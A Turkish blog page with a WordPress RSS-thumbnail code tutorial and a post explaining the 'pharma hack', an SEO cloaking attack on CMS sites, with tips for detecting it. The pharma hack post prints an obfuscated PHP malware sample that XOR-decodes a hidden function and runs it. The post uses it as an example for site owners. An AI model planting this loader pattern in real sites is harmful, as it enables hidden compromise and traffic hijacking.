Wordpress'in ön tanımlı gelen temlarındaki rss kaynaklarında sadece girdi detayları bulunur. Eğer sayfalarınızda girdilerinizi listelerken görsel olarak girdinize eklenen birincil imajı kullanıyorsanız (bir çok tema bu şekilde girdi görseli tanımlaması yapmaktadır), rsslerinize girdilerin birincil görselini (varsa) eklemek oldukça kolay olacaktır.

Wordpress'in kanca mimarisi sayesinde tema klasörünüzdeki fonksiyon tanımlamaları yapılan dosyaya ekleyeceğiniz bir fonksiyonu, rss girdileri işlenirken çağırtabilirsiniz. Bu sayede rss çıktısında gösterilecek girdileri manipule ederek rss çıktılarına girdi görsellerini ekleyebiliriz.

Bunun için, tema klasörünüzde (muhtemelen var olan) functions.php'ye
function add_thumbnails_to_rss($content, $sec = false, $third = false, $fourth = false) {
    $post_id = get_the_ID();

    $args = array(
        'post_type'      => 'attachment',
        'post_mime_type' => 'image',
        'numberposts'    => 1,
        'post_parent'    => $post_id
    );
    $attachments = get_children($args);

    $attachment_code = "";
    if( $attachments ){
        foreach($attachments as $attachment){
            $attachment_code .= '<div class="thumbnail">'. wp_get_attachment_image( $attachment->ID, 'medium' ) .'</div>';
        }
    }

    // adding attachments to entry body
    return $attachment_code . $content;
}

add_filter('the_excerpt_rss', 'add_thumbnails_to_rss');
add_filter('the_content_rss', 'add_thumbnails_to_rss');
kodunu ekleyelim. Rss girdilerini manipule edecek bir fonksiyon tanımladıktan sonra iki rss'i oluşturan methodların kancalarını kullanarak tanımladığımız fonksiyonu çağırtıyoruz. Wordpress, fonksiyona, manipule edilecek girdiye ait bazı bilgileri parametre olarak gönderiyor. İlk parametre, işimize yarıyacak tek parametre aslında. Basitçe; girdiye ait eklentileri sorgulayıp eğer girdi görseli varsa, ilk parametreyle aldığımız girdi içeriğine html kodu olarak ekliyor ve fonksiyon cevabı olarak geri dönüyoruz. Wordpress gerisini hallediyor zaten.

Yukarıda kodun son 2 satırında gördüğünüz rss kaynakları, yorumlar ve girdilere ait rss'ler. İsterseniz sadece girdilere ait rss kaynağına (the_content_rss) thumbnail eklemeyi tercih edebilirsiniz.
1 Ocak Pazar ´12
Pharma hack bır çeşit SEO saldırısıdır. Sitenizi html çıktısını kullanıcıya göre manipüle etmek üzerine kuruludur.

Pharma hack adını genellikle internette cinsel sağlık ürünleri veya besin takviyesi satan şirketlerin bu hack ile trafik kazanmaya çalışmasından almıştır.



Bu hack sadece sitenizin arama motoru trafiğini kesmez. Tabi siz analitics yazılımlarda bir trafik kaybı görmezsiniz. Sadece bounce rate'iniz her gün yükselir ve dış trafiğiniz artar. Bu da pagerank'ınızı kaybetmeninizi sağlayabilir.

Daha da tehlikelisi BTK ve MEB sitenizi google indekslerindeki yanlış ve cinsel içerikli keywordlerinizden dolayı filtreler, masum siteniz/blogunuz da en kötü ihtimalle tüm okullardan ve internet cafelerden engellenmiş olur.

Devamını Oku →

Pharma hack nedir?

Pharma hack bır çeşit SEO saldırısıdır. Asıl adı Google Cloaking Hack'dır. Sitenizi html çıktısını kullanıcıya göre manipüle etmek üzerine kuruludur. Pharma hack adını genellikle internette cinsel sağlık ürünleri veya besin takviyesi satan şirketlerin bu hack ile trafik kazanmaya çalışmasından almıştır. Yani bu hack sadece sitenizin arama motoru trafiğini kesmez. Tabi siz analitics yazılımlarda bir trafik kaybı görmezsiniz. Sadece bounce rate'iniz her gün yükselir ve dış trafiğiniz artar. Bu da pagerank'ınızı kaybetmeninizi sağlayabilir.

Büyük tehlike ise sitenizin sansürlenmesi. Türkiye'de son dönemde birçok sitenin/blogun sansürlerden dolayı engellendiğini görüyorsunuz. Bu filtreler genelde halka açık ortamlar, eğitim kurumları gibi alanlarda çok daha etkin. Yani zararsız bir siteye sahip olsanız bile bu hack ile MEB ve BTK'nın google indeksleri ile edindiği site bilgisi genelde cinsel sağlık ürünleri olacağı için muhtemelen siz o içeriğe sahip olmasanız bile okullar, internet cafe'ler gibi yerlerden otomatik olarak filtrelenmiş olacaksınız.

Nasıl oluyor?

Pharma hack sitenize doğrudan ziyaretle anlayamayacağınız bir saldırıdır. Siteniz doğrudan gelen ziyaretçilere normal çıktısını verir ve tarayıcıda doğrudan sitenize giren insanlar sitenizi görmeye devam ederler, böylece siz de anlamazsınız pharma hack altında olduğunuzu.

Ama arama motoru botları sitenizi taramaya çalıştığı zaman sitenizin hack kodu sitenizin sayfa başlığı, anahtar kelimeleri gibi meta etiketlerini değiştirip sayfa içeriğinde istedikleri anahtar kelimeleri de ekleyerek sitenizin çıktısını manipule eder. Böylece pagerank'ınızı kullanarak arama motorlarından gelen trafiğinizi çalarlar. Böylece sitenize ait tüm google indeksleri bir sonraki güncellemede o anahtar kelimeleri alır. Eğer siteniz yüksek page rankına sahipse o anahtar kelimelerde üst sıralarda çıkar ve kullanıcı linke tıkladıgı zaman sayfanızdaki ufak bir javascript kodu kullanıcıyı başka bir sunucuya yönlendirir. Arama motoru trafiğiniz yanlış içerikle sunulur ve kısaca arama motoru trafiğiniz başka bir siteye yönlendirilir.

Sitenizde pharma hack var mı?

Sitenizi sayfaları kontrol ederek pharma hack olup olmadığını anlayamazsınız. Birkaç yolu var;

1) Tarayıcınızın User Agent'ını GoogleBot olarak değiştirip sitenize girebilir, sayfalarınız öyle kontrol edebilirsiniz.

2) Google Webmaster Tools'a kayıt olup sitenizi ekleyip google botun sitenizi nasıl taradığını görebilirsiniz. Googlebot site sitenizin verdiği HTML çıktısını gösterecektir. Meta etiketlerinizi ve sayfa içeriğinizi kontrol edip fakrlı olup olmadığını görebilirsiniz.

Ne tür uygulamalarda yapıyorlar?

Benim gördüğüm örnekleri popüler php hostinglerde ya sunucu kontrolünü ele geçirdikten sonra tüm hesaplara ya da sadece sizin hesabınızı ele geçirdilerse sizin hesabınızda yapılan birkaç ufak php numarasıyla sayfalarınızı arama motoru botlarında farklı render etme üzerine kuruludur. Eğer bir wordpress bloguna veya joomla, drupal gibi bir CMS kullanıyorsanız muhtemel olarak tehlike altındasınız demektir çünkü ele geçirilmesi, gizlenmesi en kolay ve hackerların hedef kitlesidir.

Örnek bir pharma hack kodu göstermem gerekirse:
$check_tmg_password_reset_key = 'QN9Mrh7F=4?C!N^NP.NJ16YH6K66G=+BOeHeQ7D?A!"
CMD$JT,UTP@#3kSZ=j8;>?=B5$(v+}k~)tKkwz6puT|_P{-[11):V;Hblc<eyfau+Z4r29[dID2ThIY.E^A|AHcN@E-
woZPd'^'48X!Z(P<TZY/@:;f6G"/nQ<<i(YX3XE6<MjJ9X)ZnLD:7kE.9E;z=&ZIE05PEHZ
PZQmyMJY{5;*h8d;?*b19{,7 Tl/EC@X#O-M<+l18*N[X,Z]FT+K96]$E+8] 
q

t{R`0+JUFsy_';

$make_ao_site_theme_from_oldschool = '"`E``e_Fe$"dai.'|'Are!t!Y tncT)oF'; $wp_rzc_newPage = $make_ao_site_theme_from_oldschool('',$check_tmg_password_reset_key); $wp_rzc_newPage();
Bu kod wordpress bloglar için özellikle yazılmış bir pharma hack kodu. Genelde sitenizde her sayfada çalıştırılan bir dosyada yer alırlar. (bootstrap.php, common.php, db.php vs...)


Hazırlayan : Mehmet Fatih YILDIZ
9 Eylül Çarşamba ´09   —   1 Yorum

Wordpress

Şu aralar işten dolayı birkaç projemizi wordpress üzerinde sosyal medya kullanımı ile ilgili bir alanda odaklandığımız için bu konuları derinlemesine araştırmam gerekti. Zaten basit olan wordpress altyapısı üstünde api'ler, dış kaynakları kullanarak güçlü ve dışarıyla etkileşimli bloglar oluşturma konusunda hem oldukça tecrübe edindim hem de uygulama noktasında bu eklentilerin özelleştirilmesi konusunda güzel şeyler öğrendim.

Bunun anlamı şu : yakında mfyz.com'da wordpress konusunda güzel dökümanlar bulabilirsiniz. Yakın zamanda bir derleme yazısı yazacağım, devamında da bu özelleştirilebilirliği ele alıp, wordpress bloglarda sosyal medya entegrasyonu üstüne birşeyler yazabilirim.

Beklentilerinizi çok yükseltmeyin ama takip etmeye devam edin ;-)

Popüler Etiketler

javascript js jquery plugin box rss xml nedir less twitter bootstrap css css3 html5 php pear mdb2 prepare execute mysql mssql pgsql xhtml job wanda digital db database service free api blog cookie subdomain optimization google chart osx applications mail newsletter subscription search tebrik meta share htaccess apache route router mod_rewrite notebook laptop lisans license support gimp howto örnek kod widget link sql injection network social facebook ubuntu ntfs fstab doritos kampanya tytz date diff zaman tarih object session kitap ui design development mfyz generator calendar media tool phpstorm jetbrains ide editor mootools language style sitemap seo ios iphone ipad apple app store store in-app purchase purchase verification storekit itunes connect itunes icon ikon grafik download html server regex login windows query linux konsol ie internet explorer internet coding cms optimizasyon analyse procedure macosx portfolio ruffles oyun firefox kurulum nasıl workspace assets framework imza signature opengraph fql sosyal medya istatistik statistics graph export player browsers mobile app banner svn subversion proje open source wordpress dokuman cache developer while code form radio url logo spam input textarea select parse wireless compile ux webkit browser screen git version control deployment xmlhttprequest ajax button switch lifestream ipucu www redirect crossdomain connect http terminal integration startups iOS table pharma hack icons compiler on-the-fly kontrol yapıları if auth insanlar music web app